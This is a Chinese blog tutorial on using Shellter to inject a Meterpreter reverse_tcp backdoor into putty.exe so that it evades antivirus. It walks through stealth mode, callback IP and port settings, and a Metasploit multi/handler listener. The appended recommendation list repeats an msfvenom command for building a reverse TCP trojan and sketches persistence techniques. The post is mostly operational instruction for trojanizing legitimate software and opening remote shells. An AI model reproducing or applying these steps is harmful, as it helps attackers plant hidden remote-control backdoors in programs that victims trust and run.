使用Shellter生成远控木马并进行持久化控制

最新推荐文章于 2024-05-29 22:21:42 发布
最新推荐文章于 2024-05-29 22:21:42 发布
阅读量2.3k 收藏 21
点赞数 3
分类专栏: MSF入门 文章标签: linux kali 后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cj_Allen/article/details/104181166
版权

介绍

Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,想了解更多可以参考shellter官网:https://www.shellterproject.com/

步骤

Shellter该软件可以直接在官网中下载后,直接在windows中运行,也可以下载好了以后拷贝到kali中运行,当然了也可以在kali中直接apt-get install shellter来进行安装,安装好的路径为:/usr/share/windows-resources/shellter
由于我这里安装的是最新版本的kali,没有办法直接在kali中打开Shellter.exe,即使是安装了wine32后还是无法打开(所以我这里就在windows中演示 shellter的使用)。
1.在windows中打开Shellter.exe这里选择A代表的是自动模式,回车。

在这里插入图片描述2.然后进入到下面的界面,这个界面是进行联机检测版本的,直接输入Y然后回车即可。

在这里插入图片描述3.PE target是进行免杀的exe预注入文件路径(或者文件),程序会被自动备份到shellter_backup文件夹下,防止文件被破坏。

ps:这里要注意的是,进行免杀的文件一定要是32位的,64位的文件是无法进行编译注入的

这里我选择是的putty.exe也是大家常用来做演示的,由于这个软件就在我shellter的目录下面,所以我这里就没有输入路径了。

在这里插入图片描述4.回车后就开始进行编译注入了,耐心等待即可。
提示Successfully表示成功了,此时原本的putty.exe文件会被隔离到/Shellter_Backups/目录下面,在程序的根目录下面会生成一个新的putty.exe(已经注入后门的)
在这里插入图片描述5.这里提示是否使用隐身模式,选择Y,这里提示选择列出的payload还是自定义,我们选择L,输入1选择第一个payload,然后设置回连IP和回连端口。

在这里插入图片描述
这里的payloads列出来的就是msf中常用的监听协议,就不具体介绍了。
set lhost:设置监听ip地址(攻击机的ip地址)
set lport:设置监听端口

在这里插入图片描述
6.回车,等待,提示按任意键结束。
在这里插入图片描述7.打开kali中msf(具体的就不介绍了)

use use exploit/multi/handler

在这里插入图片描述

set payload windows/x64/meterpreter/reverse_tcp(payload要和上面在shellter中设置的一样)

在这里插入图片描述
8.options:查看参数
在这里插入图片描述9. set lhost:设置监听ip地址(和shellter中一样)
set lport:设置监听端口(和shellter中一样)
在这里插入图片描述10.执行exploit -j后台监听运行。
在这里插入图片描述
11.将之前用shellter生成带后门的文件,在本机(windows2008)中测试看是否上线。

在这里插入图片描述12.测试是可以成功上线的,之前的时候shellter.exe貌似对免杀还是有很强的能力的,但是我个人测试的时候连火绒都过不去,可见免杀这东西果然是见光死啊。

zhzhzh777
关注
  • 3
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
E025-渗透测试常用工具-使用msfvenom生成木马进行渗透测试.pdf
12-02
综上所述,`msfvenom`是渗透测试中不可或缺的工具,通过它,安全专家能够生成定制化的恶意软件payload,进行安全评估,并找出可能的漏洞。然而,重要的是要记住,只有在合法授权的情况下才能进行渗透测试,否则可能...
shellcode持久化--后渗透
renyizou的博客
06-16 286
migrate 隐藏(依附)进程 键盘监控 杀进程 用户哈希 持久化进程 通过写入注册表 每50秒重连主机的ip一次,走4343端口 重启之后自动链接上了 查看winxp启动项:开始---运行--输入msconfig -6 看看靶机,顺着启动项看了一下就是右上角这个.vbs文件 ...
linux上apk免杀,kali 免杀工具shellter安装以及使用(示例代码)
weixin_39886469的博客
05-29 3377
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话就需要安装wine环境来运行。我使用Kali Linux 版本是kali-linu...
kali制作木马使用shellter免杀工具来实现更低的查杀率
最新发布
勤能补拙
05-29 765
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀。
linux免杀工具,kali 免杀工具shellter安装以及使用
weixin_39726044的博客
05-12 974
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀官网:https://www.shellterproject.com/ 目前最新版本是7.2,主程序是.exe文件所以在windows下可以直接使用,在linux上运行的话就需要安装wine环境来运行。我使用Kali Linux 版本是kali-linu...
使用kali渗透工具msfvenom生成远控木马
m0_74981852的博客
06-04 2609
在杀毒软件中可以找回文件并信任改文件。右键复制到自己的电脑的一个位置,注意。1.打开kali终端>输入。2.1查看生成后门文件。6.对目标主机进行攻击。运行之后,去目标主机。
linux远程控制木马,Kali Linux-使用Shellter生成远控木马进行持久化控制
weixin_39535752的博客
05-06 3747
安装Shellter:apt-get install shellter打开shellter 操作模式选择A,PE Target:输入要捆绑木马的软件的目录,这里用putty做实验(必须是32位的程序): 选择是否使用隐形模式进入:选择Y 选择payload 或 custom:LPAYLOAD选择:1(反弹连接) 设置LHOST填控制者的IPLPORT填反弹连接的端口,随便填一个端口打开msfco...
病毒持久化操作方法
不忘初心,护天下安全!
05-05 1251
攻击者通常需要通过中断来维持对系统的访问,例如系统重启、凭据丢失或其他需要远程访问工具重新启动或备用后门才能重新获得访问权限的故障。以下将详细介绍病毒或木马后门实现持久化的常规手段。...
利用序列分析的远控木马早期检测方法研究.pdf
02-15
利用序列分析的远控木马早期检测方法研究.pdf
基于深度学习的Linux远控木马检测.pdf
08-18
基于深度学习的Linux远控木马检测.pdf
通过Go语言实现的一款基于gRPC的远控木马。.zip
05-24
通过Go语言实现的一款基于gRPC的远控木马。Go语言(也称为Golang)是由Google开发的一种静态强类型、编译型的编程语言。它旨在成为一门简单、高效、安全和并发的编程语言,特别适用于构建高性能的服务器和分布式系统...
jQuery按钮控制叠加图片旋转木马切换代码.zip
07-11
4. **旋转木马切换**:旋转木马(Carousel)是一种常见的网页元素,用于展示一组图片或内容,并允许用户通过滑动或点击按钮在这些内容之间进行循环切换。jQuery有许多插件如`carousel.js`或`bootstrap-carousel`可...
Kali Linux-使用Shellter生成远控木马进行持久化控制
吾无法无天的博客
10-20 6861
安装Shellter: apt-get install shellter 打开shellter 操作模式选择A,PE Target:输入要捆绑木马的软件的目录,这里用putty做实验(必须是32位的程序): 选择是否使用隐形模式进入:选择Y 选择payload 或 custom:L PAYLOAD选择:1(反弹连接) 设置LHOST填控制者的IP LPORT填反...
常见的几种Windows后门持久化方式
qq284489030的博客
05-09 2015
0×0 背景 持久化后门是指当入侵者通过某种手段拿到服务器的控制权之后,通过在服务器上放置一些后门(脚本、进程、连接之类),来方便他以后持久性的入侵,简单梳理一下日常遇见windows用的比较多的一些持久化方式方便以后排查问题使用。 0×1 注册表自启动 最常见的在指定键值添加一个新的键值类型为REG_SZ,数据项中添写需要运行程序的路径即可以启动,此类操作一些较为敏感容易被本地AV...
小爬虫,爬取shellcode
qq_36495104的博客
07-05 847
shellcode网站 http://shell-storm.org/shellcode/ 使用在线网站http://tools.bugscaner.com/sitemapspider 生成site map 使用下面的代码写到markdown里面去 #coding=utf-8 import requests from bs4 import BeautifulSoup import re import html haatml=r"C:\Users\Administrator.WQ-20160501NYY
meterpreter 持久化访问的多种方式
izj007的博客
05-30 6122
meterpreter 在获取shell之后,如何持续控制目标主机,即在目标主机重启或下次开机后能自动连接到攻击主机上,不必每次都需要进行攻击取得 meterpreter。 1. 通过persistence脚本 1 2 3 4 5 6 7 8 9 10 11 12 13 14 1
shellter免杀技术实战
热门推荐
自学编程_youkewang.top
03-25 1万+
Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,想了解更多可以参考shellter官网:https://www.shellterproject.com/   实验环境:kali  shellter_v6.9  360  putty.exe   图1-1.   Part1:首先使用unzip解压shellter_v6.9到当前目录,然后进入shell
记录:捆绑工具的使用 shellter
qq_38611079的博客
10-16 2066
shellter 安装  apt search shellter  查看kali 的更新源中是否含有该软件,如果有可以直接安装 apt-get install shllter 安装完成 。   shellter 使用 shellter   打开工具 A:自动模式 M:管理者模式、高级模式 H:帮助 选择A PE Target (写下索要捆绑的软件的路径,软件的路...
kali免杀工具shellter
scholar_1的博客
08-06 4003
工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。Choose Operation Mode - Auto/Manual (A/M/H):A //A:自动模式自动注入后门,M:高级模式,H:帮助。(Y/N/H): Y //是否启用隐身模式 Y:启用 N:不启用 H:帮助。...
kali生成远控木马
08-02
生成远控木马的步骤如下: 1. 打开终端,输入msfconsole命令,打开Metasploit框架。 [1] 2. 使用msfvenom命令生成木马文件。例如,可以使用以下命令生成一个Windows平台的反向TCP木马: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP地址> LPORT=<监听端口> -f exe > <木马文件名>.exe ``` 其中,LHOST是你的IP地址,LPORT是监听端口,<木马文件名>.exe是生成木马文件名。 [2] 3. 将生成木马文件传输到目标主机上。可以通过漏洞利用、社会工程学等方式将木马文件传输到目标主机上。 [3] 请注意,生成使用远控木马可能涉及非法活动,违反法律法规。本回答仅供学习和研究目的,请勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值